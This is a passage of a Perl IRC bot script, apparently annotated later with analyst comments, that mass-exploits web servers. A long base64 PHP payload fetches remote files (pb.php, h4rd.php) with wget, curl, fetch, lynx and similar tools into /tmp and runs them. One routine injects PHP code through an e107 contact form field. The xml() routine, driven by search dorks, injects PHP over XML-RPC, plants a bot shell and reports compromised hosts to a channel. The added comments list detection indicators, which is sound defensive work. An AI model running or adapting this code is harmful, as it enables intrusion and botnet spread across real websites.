waHAuKiIpOw0KQGV4ZWMoImNkIC90bXAgJiYgR0VUICIuJGluamVjdG9yLiI+cGIucGhwICYmIGNobW9kIDc1NSBwYi5waHAgJiYgcm0gLXJmIHBiLnBocC4qICYmIHBocCBwYi5waHAgJiYgR0VUICIuJGJvdHNoZWxsLiI+aDRyZC5waHAgJiYgY2htb2QgNzU1IGg0cmQucGhwICYmIHJtIC1yZiBoNHJkLnBocC4qIik7DQpAZXhlYygiY2QgL3RtcCAmJiBsd3AtZG93bmxvYWQgIi4kaW5qZWN0b3IuIiBwYi5waHAgJiYgY2htb2QgNzU1IHBiLnBocCAmJiBybSAtcmYgcGIucGhwLiogJiYgcGhwIHBiLnBocCAmJiBsd3AtZG93bmxvYWQgIi4kYm90c2hlbGwuIiBoNHJkLnBocCAmJiBjaG1vZCA3NTUgaDRyZC5waHAgJiYgcm0gLXJmIGg0cmQucGhwLioiKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3NoZWxsX2V4ZWMnKSl7DQpAc2hlbGxfZXhlYygiY2QgL3RtcCAmJiB3Z2V0ICIuJGluamVjdG9yLiIgLU8gcGIucGhwICYmIGNobW9kIDc1NSBwYi5waHAgJiYgcm0gLXJmIHBiLnBocC4qICYmIHBocCBwYi5waHAgJiYgd2dldCAiLiRib3RzaGVsbC4iIC1PIGg0cmQucGhwICYmIGNobW9kIDc1NSBoNHJkLnBocCAmJiBybSAtcmYgaDRyZC5waHAuKiIpOw0KQHNoZWxsX2V4ZWMoImNkIC90bXAgJiYgZmV0Y2ggLU8gcGIucGhwICIuJGluamVjdG9yLiIgJiYgY2htb2QgNzU1IHBiLnBocCAmJiBybSAtcmYgcGIucGhwLiogJiYgcGhwIHBiLnBocCAmJiBmZXRjaCAtTyBoNHJk
LnBocCAiLiRib3RzaGVsbC4iICYmIGNobW9kIDc1NSBoNHJkLnBocCAmJiBybSAtcmYgaDRyZC5waHAuKiIpOw0KQHNoZWxsX2V4ZWMoImNkIC90bXAgJiYgY1VybCAtTyBwYi5waHAgIi4kaW5qZWN0b3IuIiAmJiBjaG1vZCA3NTUgcGIucGhwICYmIHJtIC1yZiBwYi5waHAuKiAmJiBwaHAgcGIucGhwICYmIGNVcmwgLU8gaDRyZC5waHAgIi4kYm90c2hlbGwuIiAmJiBjaG1vZCA3NTUgaDRyZC5waHAgJiYgcm0gLXJmIGg0cmQucGhwLioiKTsNCkBzaGVsbF9leGVjKCJjZCAvdG1wICYmIGx5bnggLWR1bXAgIi4kaW5qZWN0b3IuIiBwYi5waHAgJiYgY2htb2QgNzU1IHBiLnBocCAmJiBybSAtcmYgcGIucGhwLiogJiYgcGhwIHBiLnBocCAmJiBseW54IC1kdW1wICIuJGJvdHNoZWxsLiIgaDRyZC5waHAgJiYgY2htb2QgNzU1IGg0cmQucGhwICYmIHJtIC1yZiBoNHJkLnBocC4qIik7DQpAc2hlbGxfZXhlYygiY2QgL3RtcCAmJiBHRVQgIi4kaW5qZWN0b3IuIj5wYi5waHAgJiYgY2htb2QgNzU1IHBiLnBocCAmJiBybSAtcmYgcGIucGhwLiogJiYgcGhwIHBiLnBocCAmJiBHRVQgIi4kYm90c2hlbGwuIj5oNHJkLnBocCAmJiBjaG1vZCA3NTUgaDRyZC5waHAgJiYgcm0gLXJmIGg0cmQucGhwLioiKTsNCkBzaGVsbF9leGVjKCJjZCAvdG1wICYmIGx3cC1kb3dubG9hZCAiLiRpbmplY3Rvci4iIHBiLnBocCAmJiBjaG1vZCA3NTUgcGIucGhwICYmIHJtIC1yZiBwYi5waHAuKiAmJiBwaHAgcGIucGhwICYmIGx3cC1kb3dubG9hZCAiLiRib3RzaGVsbC4iIGg0cmQucGhwICYmIGNobW9kIDc1NSBoNHJkLnBocCAmJiBybSAtcmYgaDRyZC5waHAuKiIpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQHN5c3RlbSgiY2QgL3RtcCAmJiB3Z2V0ICIuJGluamVjdG9yLiIgLU8gcGIucGhwICYmIGNobW9kIDc1NSBwYi5waHAgJiYgcm0gLXJmIHBiLnBocC4qICYmIHBocCBwYi5waHAgJiYgd2dldCAiLiRib3RzaGVsbC4iIC1PIGg0cmQucGhwICYmIGNobW9kIDc1NSBoNHJkLnBocCAmJiBybSAtcmYgaDRyZC5waHAuKiIpOw0KQHN5c3RlbSgiY2QgL3RtcCAmJiBmZXRjaCAtTyBwYi5waHAgIi4kaW5qZWN0b3IuIiAmJiBjaG1vZCA3NTUgcGIucGhwICYmIHJtIC1yZiBwYi5waHAuKiAmJiBwaHAgcGIucGhwICYmIGZldGNoIC1PIGg0cmQucGhwICIuJGJvdHNoZWxsLiIgJiYgY2htb2QgNzU1IGg0cmQucGhwICYmIHJtIC1yZiBoNHJkLnBocC4qIik7DQpAc3lzdGVtKCJjZCAvdG1wICYmIGNVcmwgLU8gcGIucGhwICIuJGluamVjdG9yLiIgJiYgY2htb2QgNzU1IHBiLnBocCAmJiBybSAtcmYgcGIucGhwLiogJiYgcGhwIHBiLnBocCAmJiBjVXJsIC1PIGg0cmQucGhwICIuJGJvdHNoZWxsLiIgJiYgY2htb2QgNzU1IGg0cmQucGhwICYmIHJtIC1yZiBoNHJkLnBocC4qIik7DQpAc3lzdGVtKCJjZCAvdG1wICYmIGx5bnggLWR1bXAgIi4kaW5qZWN0b3IuIiBwYi5waHAgJiYgY2htb2QgNzU1IHBiLnBocCAmJiBybSAtcmYgcGIucGhw
LiogJiYgcGhwIHBiLnBocCAmJiBseW54IC1kdW1wICIuJGJvdHNoZWxsLiIgaDRyZC5waHAgJiYgY2htb2QgNzU1IGg0cmQucGhwICYmIHJtIC1yZiBoNHJkLnBocC4qIik7DQpAc3lzdGVtKCJjZCAvdG1wICYmIEdFVCAiLiRpbmplY3Rvci4iPnBiLnBocCAmJiBjaG1vZCA3NTUgcGIucGhwICYmIHJtIC1yZiBwYi5waHAuKiAmJiBwaHAgcGIucGhwICYmIEdFVCAiLiRib3RzaGVsbC4iPmg0cmQucGhwICYmIGNobW9kIDc1NSBoNHJkLnBocCAmJiBybSAtcmYgaDRyZC5waHAuKiIpOw0KQHN5c3RlbSgiY2QgL3RtcCAmJiBsd3AtZG93bmxvYWQgIi4kaW5qZWN0b3IuIiBwYi5waHAgJiYgY2htb2QgNzU1IHBiLnBocCAmJiBybSAtcmYgcGIucGhwLiogJiYgcGhwIHBiLnBocCAmJiBsd3AtZG93bmxvYWQgIi4kYm90c2hlbGwuIiBoNHJkLnBocCAmJiBjaG1vZCA3NTUgaDRyZC5waHAgJiYgcm0gLXJmIGg0cmQucGhwLioiKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQHBhc3N0aHJ1KCJjZCAvdG1wICYmIHdnZXQgIi4kaW5qZWN0b3IuIiAtTyBwYi5waHAgJiYgY2htb2QgNzU1IHBiLnBocCAmJiBybSAtcmYgcGIucGhwLiogJiYgcGhwIHBiLnBocCAmJiB3Z2V0ICIuJGJvdHNoZWxsLiIgLU8gaDRyZC5waHAgJiYgY2htb2QgNzU1IGg0cmQucGhwICYmIHJtIC1yZiBoNHJkLnBocC4qIik7DQpAcGFzc3RocnUoImNkIC90bXAgJiYgZmV0Y2ggLU8gcGIucGhwICIuJGluamVjdG9yLiIgJiYgY2htb2QgNzU1IHBiLnBocCAmJiBybSAtcmYgcGIucGhwLiogJiYgcGhwIHBiLnBocCAmJiBmZXRjaCAtTyBoNHJkLnBocCAiLiRib3RzaGVsbC4iICYmIGNobW9kIDc1NSBoNHJkLnBocCAmJiBybSAtcmYgaDRyZC5waHAuKiIpOw0KQHBhc3N0aHJ1KCJjZCAvdG1wICYmIGNVcmwgLU8gcGIucGhwICIuJGluamVjdG9yLiIgJiYgY2htb2QgNzU1IHBiLnBocCAmJiBybSAtcmYgcGIucGhwLiogJiYgcGhwIHBiLnBocCAmJiBjVXJsIC1PIGg0cmQucGhwICIuJGJvdHNoZWxsLiIgJiYgY2htb2QgNzU1IGg0cmQucGhwICYmIHJtIC1yZiBoNHJkLnBocC4qIik7DQpAcGFzc3RocnUoImNkIC90bXAgJiYgbHlueCAtZHVtcCAiLiRpbmplY3Rvci4iIHBiLnBocCAmJiBjaG1vZCA3NTUgcGIucGhwICYmIHJtIC1yZiBwYi5waHAuKiAmJiBwaHAgcGIucGhwICYmIGx5bnggLWR1bXAgIi4kYm90c2hlbGwuIiBoNHJkLnBocCAmJiBjaG1vZCA3NTUgaDRyZC5waHAgJiYgcm0gLXJmIGg0cmQucGhwLioiKTsNCkBwYXNzdGhydSgiY2QgL3RtcCAmJiBHRVQgIi4kaW5qZWN0b3IuIj5wYi5waHAgJiYgY2htb2QgNzU1IHBiLnBocCAmJiBybSAtcmYgcGIucGhwLiogJiYgcGhwIHBiLnBocCAmJiBHRVQgIi4kYm90c2hlbGwuIj5oNHJkLnBocCAmJiBjaG1vZCA3NTUgaDRyZC5waHAgJiYgcm0gLXJmIGg0cmQucGhwLioiKTsNCkBwYXNzdGhydSgiY2QgL3RtcCAmJiBsd3AtZG93bmxvYWQgIi4kaW5qZWN0b3IuIiBwYi5waHAgJiYgY2htb2Qg
NzU1IHBiLnBocCAmJiBybSAtcmYgcGIucGhwLiogJiYgcGhwIHBiLnBocCAmJiBsd3AtZG93bmxvYWQgIi4kYm90c2hlbGwuIiBoNHJkLnBocCAmJiBjaG1vZCA3NTUgaDRyZC5waHAgJiYgcm0gLXJmIGg0cmQucGhwLioiKTsNCn0=";
  1529.         my $cmd = "eval(base64_decode('".$cod2."'));eval(base64_decode('".$code."')); eval(include('".$injector."')); ".$b0tcmd."";
  1530.     my $req = HTTP::Request->new(POST => $url);
  1531.     $req->content_type("application/x-www-form-urlencoded");
  1532.     $req->content("send-contactus=1&author_name=%5Bphp%5D".$cmd."%3Bdie%28%29%3B%5B%2Fphp%5D");
  1533.     my $ua = LWP::UserAgent->new(agent => $uagent);
  1534.     $ua->timeout(7);
  1535.     my $res = $ua->request($req);
  1536.     return $res->content;
  1537. }
  1538.  
  1539. sub e107_spread_query() {
  1540.     my $url = $_[0];
  1541.     my $code = "ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ==";
  1542.     my $cmd = "eval(base64_decode('".$code."')); eval(include('".$injector."')); ".$b0tcmd."";
  1543.         my $req = HTTP::Request->new(POST => $url);
  1544.     $req->content_type("application/x-www-form-urlencoded");
  1545.     $req->content("send-contactus=1&author_name=%5Bphp%5D".$cmd."%3Bdie%28%29%3B%5B%2Fphp%5D");
  1546.     my $ua = LWP::UserAgent->new(agent => $uagent);
  1547.     $ua->timeout(7);
  1548.     my $res = $ua->request($req);
  1549. }
  1550.  
  1551. ######################## xml
  1552. sub xml() {
  1553.         my ($chan,$bug,$dork,$engine) = @_;
  1554.     my $count = 0;
  1555.     my @list = &search_engine($chan,$bug,$dork,$engine,$xmllogo);
  1556.     my $num = scalar(@list);
  1557.     if ($num > 0) {
  1558.         foreach my $site (@list) {
  1559.             $count++;
  1560.             if ($count == $num-1) { if ($conf{ssdone} == 1) { &msg("$chan","$xmllogo 12(4@0$engine12) 11==14F11=15I11=0N11=0I11=15S11=14H11== "); } }
  1561.                         my $vuln = "http://".$site.$bug;
  1562.                         #my $test = "http://".$site.$bug;
  1563.                        
  1564.                         #my $html = &get_content($test);
  1565.                         #if ($html =~ /faultCode/ ) {
  1566.  
  1567.                                 my $cda = "echo'-OWNAGE-'; echo getcwd(); echo'_Hihi_'; echo php_uname(); echo'_hihi';";
  1568.                                 my $cdb = "echo'-OWNAGE-'; if(eval(include('".$injector."'))) { echo'-gang-'; } else { ".$b0tcmd." } echo'-OWNAGE-'; ";
  1569.        
  1570.                                 my $tpa = "text/xml";
  1571.                                 my $tpb = "application/xml";
  1572.        
  1573.                                 my $respa = &injxmla($vuln,$cda,$tpa); my $respb = &injxmla($vuln,$cda,$tpb);
  1574.                                 my $respc = &injxmlb($vuln,$cda,$tpa); my $respd = &injxmlb($vuln,$cda,$tpb);
  1575.                                 my $respe = &injxmlc($vuln,$cda,$tpa); my $respf = &injxmlc($vuln,$cda,$tpb);
  1576.                                 my $respg = &injxmld($vuln,$cda,$tpa); my $resph = &injxmld($vuln,$cda,$tpb);
  1577.  
  1578.                                 if ($respa =~ /-OWNAGE-(.*)_Hihi_(.*)_hihi/s) { my $pwd = $1; my $sys = $2;
  1579.                                         if(&xml_uname_check($sys) eq "+") {
  1580.                                                 if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &injxmla($vuln,$cdb,$tpa); sleep(2);
  1581.                                                         my $code =  "if(fwrite(fopen('".$pwd."/h4rd.php','w'),file_get_contents('".$botshell."'))) { echo'OWNAGE_SUCCESS';fwrite(fopen('".$pwd."/pb.php','w'),file_get_contents('".$injector."')); } elseif(copy('".$botshell."','".$pwd."/h4rd')) { echo'OWNAGE_SUCCESS';copy('".$injector."','".$pwd."/pb'); } else { echo'OWNAGE_FAILED'; } echo'_hihi';";
  1582.                                                         if(&injxmla($vuln,$code,$tpa) =~ /OWNAGE_SUCCESS/s) { &cmdxml_ok($vuln,$site,$chan,$engine,$xmllogo); }
  1583.                                                         &msg("$chan","$xmllogo 12(4@0$engine12)(7@4SYSTEM12)11 ".$vuln." 12(4@7".$sys."12)");
  1584.                                                 sleep(2); } exit; }
  1585.                                         }
  1586.                                 }
  1587.                                 elsif ($respb =~ /-OWNAGE-(.*)_Hihi_(.*)_hihi/s) { my $pwd = $1; my $sys = $2;
  1588.                                         if(&xml_uname_check($sys) eq "+") {
  1589.                                                 if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &injxmla($vuln,$cdb,$tpb); sleep(2);
  1590.                                                         my $code =  "if(fwrite(fopen('".$pwd."/h4rd.php','w'),file_get_contents('".$botshell."'))) { echo'OWNAGE_SUCCESS';fwrite(fopen('".$pwd."/pb.php','w'),file_get_contents('".$injector."')); } elseif(copy('".$botshell."','".$pwd."/h4rd')) { echo'OWNAGE_SUCCESS';copy('".$injector."','".$pwd."/pb'); } else { echo'OWNAGE_FAILED'; } echo'_hihi';";
  1591.                                                         if(&injxmla($vuln,$code,$tpb) =~ /OWNAGE_SUCCESS/s) { &cmdxml_ok($vuln,$site,$chan,$engine,$xmllogo); }
  1592.                                                         &msg("$chan","$xmllogo 12(4@0$engine12)(7@4SYSTEM12)11 ".$vuln." 12(4@7".$sys."12)");
  1593.                                                 sleep(2); } exit; }
  1594.                                         }
  1595.                                 }
  1596.                                 elsif ($respc =~ /-OWNAGE-(.*)_Hihi_(.*)_hihi/s) { my $pwd = $1; my $sys = $2;
  1597.                                         if(&xml_uname_check($sys) eq "+") {
  1598.                                                 if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &injxmlb($vuln,$cdb,$tpa); sleep(2);
  1599.                                                         my $code =  "if(fwrite(fopen('".$pwd."/h4rd.php','w'),file_get_contents('".$botshell."'))) { echo'OWNAGE_SUCCESS';fwrite(fopen('".$pwd."/pb.php','w'),file_get_contents('".$injector."')); } elseif(copy('".$botshell."','".$pwd."/h4rd')) { echo'OWNAGE_SUCCESS';copy('".$injector."','".$pwd."/pb'); } else { echo'OWNAGE_FAILED'; }  echo'_hihi';";
  1600.                                                         if(&injxmlb($vuln,$code,$tpa) =~ /OWNAGE_SUCCESS/s) { &cmdxml_ok($vuln,$site,$chan,$engine,$xmllogo); }
  1601.                                                         &msg("$chan","$xmllogo 12(4@0$engine12)(7@4SYSTEM12)11 ".$vuln." 12(4@7".$sys."12)");
  1602.                                                 sleep(2); } exit; }
  1603.                                         }
  1604.                                 }
  1605.                                 elsif ($respd =~ /-OWNAGE-(.*)_Hihi_(.*)_hihi/s) { my $pwd = $1; my $sys = $2;
  1606.                                         if(&xml_uname_check($sys) eq "+") {
  1607.                                                 if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &injxmlb($vuln,$cdb,$tpb); sleep(2);
  1608.                                                         my $code =  "if(fwrite(fopen('".$pwd."/h4rd.php','w'),file_get_contents('".$botshell."'))) { echo'OWNAGE_SUCCESS';fwrite(fopen('".$pwd."/pb.php','w'),file_get_contents('".$injector."')); } elseif(copy('".$botshell."','".$pwd."/h4rd')) { echo'OWNAGE_SUCCESS';copy('".$injector."','".$pwd."/pb'); } else { echo'OWNAGE_FAILED'; }  echo'_hihi';";
  1609.                                                         if(&injxmlb($vuln,$code,$tpb) =~ /OWNAGE_SUCCESS/s) { &cmdxml_ok($vuln,$site,$chan,$engine,$xmllogo); }
  1610.                                                         &msg("$chan","$xmllogo 12(4@0$engine12)(7@4SYSTEM12)11 ".$vuln." 12(4@7".$sys."12)");
  1611.                                                 sleep(2); } exit; }
  1612.                                         }
  1613.                                 }
  1614.                                 elsif ($respe =~ /-OWNAGE-(.*)_Hihi_(.*)_hihi/s) { my $pwd = $1; my $sys = $2;
  1615.                                         if(&xml_uname_check($sys) eq "+") {
  1616.                                                 if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &injxmlc($vuln,$cdb,$tpa); sleep(2);
  1617.                                                         my $code =  "if(fwrite(fopen('".$pwd."/h4rd.php','w'),file_get_contents('".$botshell."'))) { echo'OWNAGE_SUCCESS';fwrite(fopen('".$pwd."/pb.php','w'),file_get_contents('".$injector."')); } elseif(copy('".$botshell."','".$pwd."/h4rd')) { echo'OWNAGE_SUCCESS';copy('".$injector."','".$pwd."/pb'); } else { echo'OWNAGE_FAILED'; } echo'_hihi';";
  1618.                                                         if(&injxmlc($vuln,$code,$tpa) =~ /OWNAGE_SUCCESS/s) { &cmdxml_ok($vuln,$site,$chan,$engine,$xmllogo); }
  1619.                                                         &msg("$chan","$xmllogo 12(4@0$engine12)(7@4SYSTEM12)11 ".$vuln." 12(4@7".$sys."12)");
  1620.                                                 sleep(2); } exit; }
  1621.                                         }
  1622.                                 }
  1623.                                 elsif ($respf =~ /-OWNAGE-(.*)_Hihi_(.*)_hihi/s) { my $pwd = $1; my $sys = $2;
  1624.                                         if(&xml_uname_check($sys) eq "+") {
  1625.                                                 if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &injxmlc($vuln,$cdb,$tpb); sleep(2);
  1626.                                                         my $code =  "if(fwrite(fopen('".$pwd."/h4rd.php','w'),file_get_contents('".$botshell."'))) { echo'OWNAGE_SUCCESS';fwrite(fopen('".$pwd."/pb.php','w'),file_get_contents('".$injector."')); } elseif(copy('".$botshell."','".$pwd."/h4rd')) { echo'OWNAGE_SUCCESS';copy('".$injector."','".$pwd."/pb'); } else { echo'OWNAGE_FAILED'; } echo'_hihi';";
  1627.                                                         if(&injxmlc($vuln,$code,$tpb) =~ /OWNAGE_SUCCESS/s) { &cmdxml_ok($vuln,$site,$chan,$engine,$xmllogo); }
  1628.                                                         &msg("$chan","$xmllogo 12(4@0$engine12)(7@4SYSTEM12)11 ".$vuln." 12(4@7".$sys."12)");
  1629.                                                 sleep(2); } exit; }
  1630.                                         }
  1631.                                 }
  1632.                                 elsif ($respg =~ /-OWNAGE-(.*)_Hihi_(.*)_hihi/s) { my $pwd = $1; my $sys = $2;
  1633.                                         if(&xml_uname_check($sys) eq "+") {
  1634.                                                 if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &injxmld($vuln,$cdb,$tpa); sleep(2);
  1635.                                                         my $code =  "if(fwrite(fopen('".$pwd."/h4rd.php','w'),file_get_contents('".$botshell."'))) { echo'OWNAGE_SUCCESS';fwrite(fopen('".$pwd."/pb.php','w'),file_get_contents('".$injector."')); } elseif(copy('".$botshell."','".$pwd."/h4rd')) { echo'OWNAGE_SUCCESS';copy('".$injector."','".$pwd."/pb'); } else { echo'OWNAGE_FAILED'; }  echo'_hihi';";
  1636.                                                         if(&injxmld($vuln,$code,$tpa) =~ /OWNAGE_SUCCESS/s) { &cmdxml_ok($vuln,$site,$chan,$engine,$xmllogo); }
  1637.                                                         &msg("$chan","$xmllogo 12(4@0$engine12)(7@4SYSTEM12)11 ".$vuln." 12(4@7".$sys."12)");
  1638.                                                 sleep(2); } exit; }
  1639.                                         }
  1640.                                 }
  1641.                                 elsif ($resph =~ /-OWNAGE-(.*)_Hihi_(.*)_hihi/s) { my $pwd = $1; my $sys = $2;
  1642.                                         if(&xml_uname_check($sys) eq "+") {
  1643.                                                 if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &injxmld($vuln,$cdb,$tpb); sleep(2);
  1644.                                                         my $code =  "if(fwrite(fopen('".$pwd."/h4rd.php','w'),file_get_contents('".$botshell."'))) { echo'OWNAGE_SUCCESS';fwrite(fopen('".$pwd."/pb.php','w'),file_get_contents('".$injector."')); } elseif(copy('".$botshell."','".$pwd."/h4rd')) { echo'OWNAGE_SUCCESS';copy('".$injector."','".$pwd."/pb'); } else { echo'OWNAGE_FAILED'; }  echo'_hihi';";
  1645.                                                         if(&injxmld($vuln,$code,$tpb) =~ /OWNAGE_SUCCESS/s) { &cmdxml_ok($vuln,$site,$chan,$engine,$xmllogo); }
  1646.                                                         &msg("$chan","$xmllogo 12(4@0$engine12)(7@4SYSTEM12)11 ".$vuln." 12(4@7".$sys."12)");
  1647.                                                 sleep(2); } exit; }
  1648.                                         }
  1649.                                 }
  1650.                                 else {
  1651.                                         &injxmla($vuln,$cdb,$tpb);
  1652.                                         &injxmlb($vuln,$cdb,$tpb);
  1653.                                         &injxmlc($vuln,$cdb,$tpb);
  1654.                                         &injxmld($vuln,$cdb,$tpb);
  1655.                                         if ($conf{xmlvln} == 1) { &msg("$chan","$xmllogo 12(4@0$engine12)(4@7VULN12)11 ".$vuln); }
  1656.                                 }
  1657.                         #}
  1658.                 }
  1659.         }
  1660. }
  1661. ###############################################################################################
  1662. sub xml_uname_check() {
        # Analyst note: classifies the text captured between the `_Hihi_` and
        # `_hihi` markers by xml() as a real command result ("+") or as the
        # probe source merely reflected back by the server ("-").
        #
        # Argument: $_[0] - the captured string (second capture group of the
        #           marker regex used in xml()).
        # Returns:  "-" when the string is exactly one of the literal, quoted,
        #           URL-encoded, HTML-entity-encoded or double-URL-encoded
        #           renderings of the probe fragment listed below; "+" for
        #           anything else.
        #
        # Every comparison is an exact `eq`, so any rendering not listed here
        # (different spacing, different encoding) is treated as "+".
        # $rtrn is assigned without `my` in this sub, so unless it is declared
        # elsewhere in the file it is a package global shared across calls.
        #
        # Defensive use: the marker strings `-OWNAGE-`, `_Hihi_` and `_hihi`
        # sent by xml() are fixed text and can be matched in request bodies
        # and web-server/WAF logs.
  1663. my $sys = $_[0];
  1664.  
  1665. if ($sys eq "';echo php_uname();echo'") { $rtrn = "-"; }
  1666. elsif ($sys eq "; echo php_uname(); echo") { $rtrn = "-"; }
  1667. elsif ($sys eq "'; echo php_uname(); echo'") { $rtrn = "-"; }
        # In a double-quoted Perl string `\'` is just `'` and `\(`/`\)` lose
        # their backslash, so the next two branches compare against the same
        # text as the branch above.
  1668. elsif ($sys eq "\'; echo php_uname(); echo\'") { $rtrn = "-"; }
  1669. elsif ($sys eq "'; echo php_uname\(\); echo'") { $rtrn = "-"; }
  1670. elsif ($sys eq "%3B+echo+php_uname()%3B+echo") { $rtrn = "-"; }
  1671. elsif ($sys eq "&#39;; echo php_uname(); echo&#39;") { $rtrn = "-"; }
  1672. elsif ($sys eq "%27%3B+echo+php_uname()%3B+echo%27") { $rtrn = "-"; }
  1673. elsif ($sys eq "'%3b%20echo%20php_uname()%3b%20echo'") { $rtrn = "-"; }
  1674. elsif ($sys eq "%27%3Becho+php_uname%28%29%3Becho%27") { $rtrn = "-"; }
  1675. elsif ($sys eq "%27%3B+echo+php_uname%28%29%3B+echo%27") { $rtrn = "-"; }
  1676. elsif ($sys eq "'%3b%20echo%20php_uname%28%29%3b%20echo'") { $rtrn = "-"; }
  1677. elsif ($sys eq "%27%3B%20echo%20php_uname%28%29%3B%20echo%27") { $rtrn = "-"; }
  1678. elsif ($sys eq "%2527%253B%2520echo%2520php_uname%2528%2529%253B%2520echo%2527") { $rtrn = "-"; }
  1679. else { $rtrn = "+"; }
  1680.  
  1681. return $rtrn;
  1682. }
  1683.  
  1684. sub cmdxml_ok() {
        # Analyst note: post-compromise verification step. It requests the
        # file name the script tried to write (`h4rd.php`) and, if the body
        # contains the marker `0wn3d`, reports the URL through info_main()
        # and then requests `pb.php` from the same location.
        #
        # Arguments: $vuln    - full URL that was posted to
        #            $site    - host/path string from the search results
        #            $chan, $engine, $xmllogo - passed through to info_main()
        # Returns:   nothing meaningful (value of the last statement).
        # get_content() and info_main() are defined outside this block.
        #
        # Indicators visible here for incident response: files named
        # `h4rd.php` / `pb.php` in the directory of an XML-RPC endpoint, GET
        # requests for those two names shortly after an XML POST, and the
        # string `0wn3d` in a response body.
  1685. my ($vuln,$site,$chan,$engine,$xmllogo) = @_;
        # Greedy `(.*)` with /s: $1 is everything between "http://" and the
        # LAST "/" of $vuln, i.e. host plus directory of the posted URL.
  1686. if ($vuln =~ /http:\/\/(.*)\//s) { my $urover = $1;
  1687.         my $dar = "http://".$urover."/h4rd.php";
  1688.         my $der = "http://".$urover."/pb.php";
  1689.         my $checka = &get_content($dar);
  1690.         if ($checka =~ /0wn3d/ ) { &info_main($dar,$chan,$engine,$xmllogo); sleep(1); &get_content($der); }
  1691. } else {
        # Fallback when $vuln has no "http://.../" shape: same check, built
        # from $site instead.
  1692.         my $dor = "http://".$site."/h4rd.php";
  1693.         my $dur = "http://".$site."/pb.php";
  1694.         my $checkb = &get_content($dor);
  1695.         if ($checkb =~ /0wn3d/ ) { &info_main($dor,$chan,$engine,$xmllogo); sleep(1); &get_content($dur); }
  1696. }
  1697. }
  1698.  
  1699. sub rstring
        # Build a random alphanumeric string.
        #
        # Argument: requested length (first element of @_).
        # Returns:  a string of that many characters drawn from a-z, A-Z, 0-9;
        #           undef when the requested length is less than 1, because
        #           $random_string is never assigned in that case.
        # Uses Perl's built-in rand(), which is not a cryptographic generator.
  1700. {
  1701. my $length_of_randomstring=shift;
  1702. my @chars=('a'..'z','A'..'Z','0'..'9');
  1703. my $random_string;
  1704. foreach (1..$length_of_randomstring) {
        # `rand @chars` evaluates @chars in scalar context (62) and the
        # fractional result is truncated when used as an array index.
  1705.         $random_string.=$chars[rand @chars];
  1706. }
  1707. return $random_string;
  1708. }
  1709.  
  1710. my $rand0 = &rstring(15); my $rand1 = &rstring(15);
        # Analyst note: eleven 15-character random tokens created once at file
        # scope. In the visible code $rand2..$rand7 fill the <methodName>,
        # <name> and <value> fields of the XML bodies built by injxmla/b/c;
        # the remaining ones are not referenced in this part of the file.
        # Because these values differ per run, detection rules should key on
        # the fixed structural text of the request bodies rather than on the
        # method or parameter names.
  1711. my $rand2 = &rstring(15); my $rand3 = &rstring(15);
  1712. my $rand4 = &rstring(15); my $rand5 = &rstring(15);
  1713. my $rand6 = &rstring(15); my $rand7 = &rstring(15);
  1714. my $rand8 = &rstring(15); my $rand9 = &rstring(15);
  1715. my $rand10 = &rstring(15);
  1716.  
  1717. ###############################################################################################
  1718. sub injxmla() {
        # Analyst note: request builder, variant "a". Sends one HTTP POST
        # whose body is an XML-RPC <methodCall> with caller-supplied PHP text
        # ($code) embedded in the parameter value.
        #
        # Arguments: $url  - endpoint to POST to
        #            $code - text placed verbatim into the body
        #            $type - Content-Type header value (xml() passes
        #                    "text/xml" or "application/xml")
        # Returns:   the response body ($res->content).
        # $uagent is defined outside this block; $exp is assigned without
        # `my`, so it is shared with the sibling injxml* subs.
        #
        # What a defender can match on: a POST with an XML content type whose
        # <value> contains `<base64>'));` followed by PHP statements and
        # `exit;`. The <value> and <base64> elements are never closed in this
        # body, so it is not well-formed XML.
  1719. my ($url,$code,$type) = @_;
  1720. my $userAgent = LWP::UserAgent->new(agent => $uagent);
  1721. $userAgent->timeout(20);
  1722.  
  1723.         $exp = "<?xml version=\"1.0\"?>";
  1724.         $exp .= "<methodCall>";
  1725.         $exp .= "<methodName>".$rand6."</methodName>";
  1726.         $exp .= "<params><param>";
